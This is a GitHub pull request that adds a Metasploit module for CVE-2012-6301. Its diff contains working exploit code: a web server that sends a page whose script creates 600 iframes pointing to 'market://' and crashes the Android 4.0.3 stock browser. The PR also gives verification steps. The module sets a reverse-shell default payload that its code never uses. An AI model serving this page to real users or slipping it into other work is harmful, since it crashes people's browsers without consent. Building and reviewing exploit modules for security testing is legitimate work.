### PR TITLE
Create Android Browser DOS module (CVE-2012-6301)

### DIFF
--- a/modules/auxiliary/gather/android_stock_browser_iframe_dos.rb
+++ b/modules/auxiliary/gather/android_stock_browser_iframe_dos.rb
@@ -1,0 +1,65 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Android Stock Browser Iframe DOS",
+      'Description'    => %q{
+        This module exploits a vulnerability in the native browser that comes with Android 4.0.3.
+        If successful, the browser will crash after viewing the webpage.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'Jean Pascal Pereira',  # Original exploit discovery
+        'Jonathan Waggoner'     # Metasploit module
+      ],
+      'References' => [
+        [ 'URL', 'http://packetstormsecurity.com/files/118539/Android-4.0.3-Browser-Crash.html'],
+        [ 'CVE', '2012-6301' ]
+      ],
+      'Platform'            => 'android',
+      'Arch'                => ARCH_DALVIK,
+      'DefaultOptions'      => { 'PAYLOAD' => 'android/shell/reverse_http' },
+      'Targets'             => [ [ 'Automatic', {} ] ],
+      'DisclosureDate'      => "Dec 1 2012",
+      'DefaultTarget'       => 0
+      ))
+  end
+
+  def on_request_uri(cli, request)
+    html = %Q|
+    <html>
+    <body>
+    <script type="text/javascript">
+
+    var m_frame = "";
+
+    for(var i = 0; i < 600; i++)
+    {
+
+     m_frame = document.createElement("iframe");
+     m_frame.setAttribute("src", "market://a");
+
+     document.body.appendChild(m_frame);
+    }
+    </script>
+    </body>
+    </html>
+    |
+
+    print_status(msg = 'Getting ready to send HTML to client')
+    send_response(cli, html)
+    print_status(msg = 'Sent HTML to client')
+
+  end
+
+end


### PR DESCRIPTION
This PR adds `modules/auxiliary/gather/android_stock_browser_iframe_dos.rb` using the [exploit](https://packetstormsecurity.com/files/118539/Android-4.0.3-Browser-Crash.html) discovered by Jean Pascal Pereira in CVE-2012-6301.  This exploits a vulnerability in
Android 4.0.3 and causes the stock browser to unexpectedly close.
# Verification
- [ ] Install and run Android 4.0.3 on a device or use an Android Virtual Device running Android 4.0.3 (API level 15)
- [ ] Run msfconsole and use the module:
  
  ```
  modules/auxiliary/gather/android_stock_browser_iframe_dos
  ```

![screen shot 2015-06-14 at 4 03 21 pm](https://cloud.githubusercontent.com/assets/12597083/8150233/a08ebe1e-12af-11e5-981d-1b0d575e04ea.png)
![screen shot 2015-06-14 at 4 04 27 pm](https://cloud.githubusercontent.com/assets/12597083/8150234/a09103f4-12af-11e5-9fc4-ed9f6cd59de4.png)
